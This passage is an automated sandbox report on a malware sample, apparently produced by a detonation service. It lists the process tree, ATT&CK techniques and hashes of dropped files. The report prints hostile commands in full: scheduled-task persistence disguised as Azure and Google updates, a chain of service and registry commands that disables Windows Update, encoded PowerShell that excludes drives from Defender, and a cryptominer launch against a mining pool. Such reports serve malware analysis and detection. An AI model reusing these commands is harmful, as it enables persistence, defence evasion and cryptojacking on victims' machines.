C:\Users\Admin\AppData\Local\Temp\EE04.exe
C:\Users\Admin\AppData\Local\Temp\EE04.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3816

C:\Users\Admin\AppData\Local\Temp\EE04.exe
C:\Users\Admin\AppData\Local\Temp\EE04.exe
2⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1408

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\a4ee222b-bf04-44ac-9a5c-fd2a0c77697a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4216

C:\Users\Admin\AppData\Local\Temp\EE04.exe
"C:\Users\Admin\AppData\Local\Temp\EE04.exe" --Admin IsNotAutoStart IsNotTask
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4244

C:\Users\Admin\AppData\Local\Temp\EE04.exe
"C:\Users\Admin\AppData\Local\Temp\EE04.exe" --Admin IsNotAutoStart IsNotTask
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5000

C:\Users\Admin\AppData\Local\4508ebe5-dea0-4b91-8675-27cd4b4166dd\build2.exe
"C:\Users\Admin\AppData\Local\4508ebe5-dea0-4b91-8675-27cd4b4166dd\build2.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2620

C:\Users\Admin\AppData\Local\4508ebe5-dea0-4b91-8675-27cd4b4166dd\build2.exe
"C:\Users\Admin\AppData\Local\4508ebe5-dea0-4b91-8675-27cd4b4166dd\build2.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
PID:3980

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\4508ebe5-dea0-4b91-8675-27cd4b4166dd\build2.exe" & exit
7⤵
PID:4192

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:820

C:\Users\Admin\AppData\Local\4508ebe5-dea0-4b91-8675-27cd4b4166dd\build3.exe
"C:\Users\Admin\AppData\Local\4508ebe5-dea0-4b91-8675-27cd4b4166dd\build3.exe"
5⤵
- Executes dropped EXE
PID:3532

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
6⤵
- Creates scheduled task(s)
PID:4864

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:5076

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4180

C:\Users\Admin\AppData\Local\Temp\527C.exe
C:\Users\Admin\AppData\Local\Temp\527C.exe
1⤵
- Executes dropped EXE
PID:4784

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
2⤵
PID:8

C:\Users\Admin\AppData\Local\Temp\5E35.exe
C:\Users\Admin\AppData\Local\Temp\5E35.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
PID:3460

C:\Users\Admin\AppData\Roaming\EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe
"C:\Users\Admin\AppData\Roaming\EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6467.tmp.bat""
3⤵
PID:1644

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:5036

C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe
"C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:1844

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
5⤵
PID:4748

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
6⤵
- Creates scheduled task(s)
PID:3216

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RKsS6XcgidDNc8rU38Yiv5STQutyMUu9A4.installs001 -p x -t 6
5⤵
PID:5048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
6⤵
PID:1324

C:\Users\Admin\AppData\Local\Temp\7568.exe
C:\Users\Admin\AppData\Local\Temp\7568.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
PID:2144

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Browser Update.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Browser Update.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:4692

C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe
"C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe" -l [email protected]
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
PID:2264

C:\Users\Admin\AppData\Local\Temp\83D0.exe
C:\Users\Admin\AppData\Local\Temp\83D0.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:4560

C:\Windows\Temp\miner2.exe
"C:\Windows\Temp\miner2.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:4360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAcABsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBpAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB6AHMAIwA+AA=="
3⤵
PID:1356

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:1584

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:2932

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:4972

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:3532

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:3212

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:1076

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:2184

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:4248

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies registry key
PID:3220

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:3232

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:4388

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4084

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2476

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2020

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1984

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:3920

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:3852

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:4460

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:1412

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:4892

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:2236

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:3140

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:2068

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:4436

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
PID:4076

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
PID:2860

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
PID:3540

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
PID:3048

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
PID:4816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAYgAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBHAFkAQQBkAEEAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBIAEEARwA4AEEAYgB3AEIAbgBBAEcAdwBBAFoAUQBCAGMAQQBFAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEYAdwBBAGQAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQB0AEEARgBZAEEAWgBRAEIAeQBBAEcASQBBAEkAQQBCAFMAQQBIAFUAQQBiAGcAQgBCAEEASABNAEEASQBBAEEAOABBAEMATQBBAGEAdwBCAHEAQQBIAGsAQQBJAHcAQQArAEEAQQA9AD0AIgAnACkAIAA8ACMAeABsACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAZwBsAHAAbwAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGgAeQBjAGgAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBiAHYAawBjACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwAbQBpAG4AZQByADIALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBzAGIAawBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBuAHQAcABhACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="
3⤵
PID:1080

C:\Users\Admin\AppData\Local\Temp\8875.exe
C:\Users\Admin\AppData\Local\Temp\8875.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 1224
2⤵
- Program crash
PID:2416

C:\Users\Admin\AppData\Local\Temp\AB50.exe
C:\Users\Admin\AppData\Local\Temp\AB50.exe
1⤵
- Executes dropped EXE
PID:2608

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
2⤵
PID:4372

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
- Executes dropped EXE
PID:4252

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
2⤵
- Creates scheduled task(s)
PID:1336

C:\Users\Admin\AppData\Local\Temp\AFD5.exe
C:\Users\Admin\AppData\Local\Temp\AFD5.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3524

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
2⤵
PID:1652

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4168

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:1036

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1256

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:1908

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2208 -ip 2208
1⤵
PID:4244

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4528

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4720

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:1664

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGYAdAAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAawBqAHkAIwA+AA=="
1⤵
PID:1800

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

Impair Defenses

Modify Registry

Scripting

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe
Filesize
9.9MB

MD5
fa0733b9fea77460a5c006e384779577

SHA1
d34ad581d313b353c1f74209fcc8a659f236f79a

SHA256
b439153b2144bb1566c0454cf563d54d7bcd6983488555bdc170f0414f60d2bd

SHA512
efec566a345a318fff8cece6f41d7db29263b3ac0bd95b15603148ed9c02a4122821827eb1e0cbcc25335d9d37910c1da098a2f46bf2b78efea92d37e95b193b

Download Submit
C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe
Filesize
9.9MB

MD5
fa0733b9fea77460a5c006e384779577

SHA1
d34ad581d313b353c1f74209fcc8a659f236f79a

SHA256
b439153b2144bb1566c0454cf563d54d7bcd6983488555bdc170f0414f60d2bd

SHA512
efec566a345a318fff8cece6f41d7db29263b3ac0bd95b15603148ed9c02a4122821827eb1e0cbcc25335d9d37910c1da098a2f46bf2b78efea92d37e95b193b

Download Submit
C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe
Filesize
836KB

MD5
edb6463d39eb1305c07400d169a40eba

SHA1
456f4da4c204f7dd77af1834275213f663128e11

SHA256
b0319fee29612b6f40ee9a9368cc23273c233547d9b1aa3bb551f8b57496ceb9

SHA512
ab03697252ef332f4c8373bc47e3584302b58d3b314cecf9f9f39b3bbc7b1771080671185c4d29d57b1cfcc605afe70132ece7667d638a64096853e6d7c72306

Download Submit
C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe
Filesize
836KB

MD5
edb6463d39eb1305c07400d169a40eba

SHA1
456f4da4c204f7dd77af1834275213f663128e11

SHA256
b0319fee29612b6f40ee9a9368cc23273c233547d9b1aa3bb551f8b57496ceb9

SHA512
ab03697252ef332f4c8373bc47e3584302b58d3b314cecf9f9f39b3bbc7b1771080671185c4d29d57b1cfcc605afe70132ece7667d638a64096853e6d7c72306

Download Submit
C:\ProgramData\mozglue.dll
Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll
Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
Filesize
2KB

MD5
b00f59ce59a95f5fe629aff007e982fa

SHA1
8eb54eb49c540b80dba22e0a863f8122b48df410

SHA256
d3559d4f89073b9bd7764d42e0fd258f78d98b5344af368056696f5fb6a87c46

SHA512
6317a36087f2166e5a77a5761d7ad662c76b2989840af4e89e8a93845c8c7f47e6a26341be77db39ca687aacb5e50ad3730a5ee4b6d76669637b676a31b0efb3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
Filesize
1KB

MD5
9943ca8035a49104bcf439b0b5709ba9

SHA1
c093958b52d77399cdca68aad9f3caaf8b7e1ee0

SHA256
7c47af0f9d8130cd4dad283a4d1d0e7a0b4faffa346b5bcace6b3d53d6a7ac5c

SHA512
4be5b90783c87600d8d421959f0c5b36a97ac6d64d9e1e497056bd016d5cc9e141a55ca8632c8b3e5c5b936a4b0a46295aa951c40470a77fa4ec85ad45d64227

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
Filesize
488B

MD5
72d2b1d5928739e16a56632a93e35a16

SHA1
1c9880170b8cd4deb48a4f5db1d5004eca7537f3

SHA256
556d1de05e7187b6a8a6db2e017d4efa2a48eb7d29a5ec0852f89ead338197e3

SHA512
96f2218f5d4e7986fce815c9c5d299d663b3ea592b54af1e5cabb0861f9ccecde4fe40e38500640fbc0348162c00658bbb790741208e7b22fd5182ceb41a3002

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
Filesize
482B

MD5
fa981784b807dbff83a9ae009de5e48c

SHA1
3a3b3647408fd05f0b73c63bdb353dcffb5d1acb

SHA256
20085cd2b0587a77987114fe19a9ee3d24b3cd4ec0203db6849e0528aa114692

SHA512
7901496e1076bab5f7e0f205fb4db75e1cbae39768f72d42ccd0355eced3d4437256e66eece6f4f9dc8f30ffd35224f3fdcdf737fae3465b85736281cc1c348f

Download Submit
C:\Users\Admin\AppData\Local\4508ebe5-dea0-4b91-8675-27cd4b4166dd\build2.exe
Filesize
301KB

MD5
9964dec7f63403963374ebae4ba27e44

SHA1
51c8d242bbbc34b9d0135bcdaa53b5e78449b73d

SHA256
0b98114cfbe3e32c681ebb5a4a867391da2d235b771227af97f46825b95de3f2

SHA512
41cc95c052b85997c47cceaa0665788607b577005e93ae08b48b54d10a3ead190f56219238d3579e45ce18601220474f8e860ad8efb1d22c475070d79c202937

Download Submit
C:\Users\Admin\AppData\Local\4508ebe5-dea0-4b91-8675-27cd4b4166dd\build2.exe
Filesize
301KB

MD5
9964dec7f63403963374ebae4ba27e44

SHA1
51c8d242bbbc34b9d0135bcdaa53b5e78449b73d

SHA256
0b98114cfbe3e32c681ebb5a4a867391da2d235b771227af97f46825b95de3f2

SHA512
41cc95c052b85997c47cceaa0665788607b577005e93ae08b48b54d10a3ead190f56219238d3579e45ce18601220474f8e860ad8efb1d22c475070d79c202937

Download Submit
C:\Users\Admin\AppData\Local\4508ebe5-dea0-4b91-8675-27cd4b4166dd\build2.exe
Filesize
301KB

MD5
9964dec7f63403963374ebae4ba27e44

SHA1
51c8d242bbbc34b9d0135bcdaa53b5e78449b73d

SHA256
0b98114cfbe3e32c681ebb5a4a867391da2d235b771227af97f46825b95de3f2

SHA512
41cc95c052b85997c47cceaa0665788607b577005e93ae08b48b54d10a3ead190f56219238d3579e45ce18601220474f8e860ad8efb1d22c475070d79c202937

Download Submit
C:\Users\Admin\AppData\Local\4508ebe5-dea0-4b91-8675-27cd4b4166dd\build3.exe
Filesize
9KB

MD5
9ead10c08e72ae41921191f8db39bc16

SHA1
abe3bce01cd34afc88e2c838173f8c2bd0090ae1

SHA256
8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

SHA512
aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

Download Submit
C:\Users\Admin\AppData\Local\4508ebe5-dea0-4b91-8675-27cd4b4166dd\build3.exe
Filesize
9KB

MD5
9ead10c08e72ae41921191f8db39bc16

SHA1
abe3bce01cd34afc88e2c838173f8c2bd0090ae1

SHA256
8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

SHA512
aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
